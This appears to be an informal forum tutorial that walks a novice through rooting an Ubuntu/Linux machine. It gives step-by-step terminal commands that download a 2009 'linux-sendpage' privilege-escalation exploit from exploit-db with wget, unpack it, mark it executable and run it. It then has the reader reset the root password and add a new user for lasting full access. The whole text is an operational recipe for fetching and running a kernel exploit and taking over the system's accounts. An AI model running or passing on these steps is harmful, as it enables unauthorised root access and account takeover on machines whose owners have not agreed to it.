First you go "Applications" then "Accessories" and click on Terminal.

now you see "user@hostname:-$" in the white window.
Lets start now type cd /var/tmp
Now type wget http://www.exploit-db.com/sploits/2009-linux-sendpage2.tar.gz
when download finish type tar -zxvf 2009-linux-sendpage2.tar.gz
when extrast finish type cd linux-sendpage2
now you are in the folder "linux-sendpage2" now type chmod +x *
And the last command is ./run

When exploit finish you will got one message you got it and your "user@hostname:-$" will be "sh-3.1" then you will type bash and "sh-3.1" will change to "[root@hostname~]#" so you got the "root"
now you change password with command "passwd"

"Changing password for user root.
New UNIX password: here add your pass
Retype new UNIX password: here add the same pass"

now type sudo -i or su - root .
then type adduser user (change user to your name or what you want)
when you add the user type passwd user and add your pass.
now loggout from linux. and login with user who you add .

With that user you will have all permisions . if any program who you know to install on linux you can use Add/Remove there have too many applications for ubuntu. when you install some app you got a window to add password pass is that who you add on the user.
